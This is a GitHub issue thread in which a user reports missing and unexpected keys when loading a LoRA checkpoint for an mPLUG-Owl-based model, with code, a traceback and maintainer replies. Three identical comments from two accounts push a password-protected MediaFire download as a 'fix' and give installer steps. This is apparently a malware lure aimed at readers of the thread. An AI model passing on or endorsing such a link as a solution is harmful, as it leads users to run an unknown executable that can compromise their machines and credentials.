### ISSUE TITLE
'load_state_dict' Missing Key(s)

### ISSUE THREAD

**Issue by sbY99** [FuxiaoLiu/MMC#20]
Hi, thank you for your hard work.
Unfortunately, I encountered an issue when running the code for the fine-tuned model inference.
If I’ve made any mistakes, please let me know.
Thank you!

**Code**
```
import os
import sys
import torch
from peft import LoraConfig, get_peft_model

from mPLUG_Owl.mplug_owl.modeling_mplug_owl import MplugOwlForConditionalGeneration
from mPLUG_Owl.mplug_owl.tokenization_mplug_owl import MplugOwlTokenizer
from mPLUG_Owl.mplug_owl.processing_mplug_owl import MplugOwlImageProcessor, MplugOwlProcessor
from transformers import AutoTokenizer

base_model = 'MAGAer13/mplug-owl-llama-7b'
load_in_8bit=False
bf16 = True
image_processor = MplugOwlImageProcessor.from_pretrained(base_model)
tokenizer = AutoTokenizer.from_pretrained(base_model)
processor = MplugOwlProcessor(image_processor, tokenizer)
model = MplugOwlForConditionalGeneration.from_pretrained(
     base_model,
     load_in_8bit=load_in_8bit,
     torch_dtype=torch.bfloat16 if bf16 else torch.half,
     device_map="auto"
 )
tokenizer = processor.tokenizer
        
peft_config = LoraConfig(target_modules=r'.*language_model.*\.(q_proj|v_proj)', inference_mode=False, r=8,lora_alpha=32, lora_dropout=0.05)
model = get_peft_model(model, peft_config)
lora_path = 'checkpoint.pth'
prefix_state_dict = torch.load(lora_path, map_location='cpu',)
model.load_state_dict(prefix_state_dict)
```

**Error**
```
RuntimeError: Error(s) in loading state_dict for PeftModel:
Missing key(s) in state_dict: "base_model.model.query_tokens", ...
Unexpected key(s) in state_dict: "model", "optimizer", "config", "scaler", "epoch". 
```

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FuxiaoLiu** [comment]
Our model is based on mplug-owl v1, can you make sure that your code align with this. Additionally, in your code, you use the model "base_model = 'MAGAer13/mplug-owl-llama-7b". Is it a different model?

**Comment by sbY99** [comment]
@FuxiaoLiu  Thank you for your response. I followed the guidelines on the [mPLUG-Owl (v1) GitHub](https://github.com/X-PLUG/mPLUG-Owl/tree/main/mPLUG-Owl#model-initialization) and downloaded the model checkpoint from [Hugging Face](https://huggingface.co/MAGAer13/mplug-owl-llama-7b). Is this a different model from the one you’re using? If so, could you please let me know which model you used?
